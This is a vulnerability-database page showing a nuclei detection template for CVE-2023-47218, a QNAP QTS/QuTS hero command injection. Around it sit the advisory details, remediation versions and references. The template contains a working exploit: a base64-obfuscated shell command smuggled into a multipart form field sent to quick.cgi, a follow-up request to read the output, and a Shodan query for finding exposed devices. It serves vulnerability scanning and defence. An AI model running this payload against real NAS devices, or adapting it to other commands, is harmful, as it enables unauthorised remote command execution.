Lucene search
K

QNAP QTS and QuTS Hero - OS Command Injection

🗓️ 26 Jun 2026 18:13:08Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 110 Views

QNAP OS Command Injection vulnerability fixed in QTS and QuTS Hero - QTS 5.1.5.2645 build 20240116, QuTS hero h5.1.5.2647 build 20240118, QuTScloud c5.1.5.265

Related
Refs
Code
id: CVE-2023-47218

info:
  name: QNAP QTS and QuTS Hero - OS Command Injection
  author: ritikchaddha
  severity: medium
  description: |
    An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to execute commands via a network. We have already fixed the vulnerability in the following versions: QTS 5.1.5.2645 build 20240116 and later QuTS hero h5.1.5.2647 build 20240118 and later QuTScloud c5.1.5.2651 and later.
  impact: |
    Unauthenticated attackers on the local network can execute arbitrary commands remotely, potentially compromising NAS devices and stored data.
  remediation: |
    Update to QTS 5.1.5.2645 build 20240116 or later, QuTS hero h5.1.5.2647 build 20240118 or later, or QuTScloud c5.1.5.2651 or later.
  reference:
    - https://github.com/passwa11/CVE-2023-47218
    - https://twitter.com/win3zz/status/1760224052289888668/photo/3
    - https://www.rapid7.com/blog/post/2024/02/13/cve-2023-47218-qnap-qts-and-quts-hero-unauthenticated-command-injection-fixed/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-47218
    - https://www.qnap.com/en/security-advisory/qsa-23-57
  classification:
    cvss-metrics: CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 5.8
    cve-id: CVE-2023-47218
    cwe-id: CWE-77
    epss-score: 0.89157
    epss-percentile: 0.99763
    cpe: cpe:2.3:o:qnap:qts:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    shodan-query: ssl.cert.issuer.cn:"QNAP NAS",title:"QNAP Turbo NAS"
    product: qts
    vendor: qnap
  tags: cve,cve2023,qnap,qts,quts,rce,intrusive,vkev,vuln
variables:
  file: '{{rand_base(6)}}'
  cmd: '%22$($(echo -n aWQ=|base64 -d)>{{file}})%22'

http:
  - raw:
      - |
        POST /cgi-bin/quick/quick.cgi?func=switch_os&todo=uploaf_firmware_image HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data;boundary="avssqwfz"

        --avssqwfz
        Content-Disposition: form-data; xxpcscma="field2"; zczqildp="{{cmd}}"
        Content-Type: text/plain

        skfqduny
        --avssqwfz–

      - |
        POST /cgi-bin/quick/{{file}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body_1, "code\": 200", "full_path_filename success")'
          - 'contains_all(body_2, "uid=", "gid=")'
          - 'status_code == 200'
        condition: and
# digest: 490a004630440220762204d86f68dcdaf84964706dab51518b07f7bfc1df6a83ac2c1d6e774051c1022020d8e79e4b3c4bc87bb00f0b66924f56fa815e8b911569289e207fd4568ae215:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.9Medium risk
Vulners AI Score6.9
CVSS 3.15.8 - 8.3
EPSS0.89157
SSVC
110